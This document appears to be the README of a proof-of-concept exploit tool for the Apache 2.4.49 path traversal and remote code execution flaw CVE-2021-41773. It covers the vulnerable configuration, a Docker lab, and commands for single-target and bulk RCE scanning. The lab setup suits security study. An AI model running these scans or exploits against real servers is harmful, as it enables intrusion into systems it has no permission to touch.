Exploit for Path Traversal in Apache Http Server CVE-2021-41773

## https://sploitus.com/exploit?id=3CF66144-235E-5F7A-B889-113C11ABF150
# Apache 2.4.49 - Path Traversal or Remote Code Execution
cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in [Apache 2.4.49](https://archive.apache.org/dist/httpd/httpd-2.4.49.tar.gz). Vulnerable instance of Docker is provided to get your hands dirty on [CVE-2021-41773](https://vulners.com/cve/CVE-2021-41773)

If CGI-BIN is enabled than, we can perform Remote Code Execution but not Path Traversal, so "icons" directory has been added under Alias section in httpd.conf for checking Path Traversal vulnerability.

# Vulnerable Configurations in httpd.conf
```
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
```

# Lab for CVE-2021-41773
### Build Docker
```
$ docker build -t cve-2021-41773 .
```
### Run Docker
```
$ docker run -it cve-2021-41773
```

# Usage cve-2021-41773.py
### Check for Path Traversal and Remote Code Execution
```
$ python3 cve-2021-41773.py -u http://172.17.0.2
```

### Path Traversal PoC
```
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
```

### Remote Code Execution PoC
```
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
```

### For bulk scanning, provide a text file containing IPs:
```
$ python3 cve-2021-41773.py -l list.txt
```
```
$ python3 cve-2021-41773.py -l list.txt -pt
```
```
$ python3 cve-2021-41773.py -l list.txt -rce
```

More information can be found [here](https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/).

### References
* https://nvd.nist.gov/vuln/detail/CVE-2021-41773
* https://vulners.com/cve/CVE-2021-41773
* https://httpd.apache.org/security/vulnerabilities_24.html
* https://vulners.com/cve/CVE-2021-41773
* https://walnutsecurity.com/path-traversal-remote-code-execution-in-apache/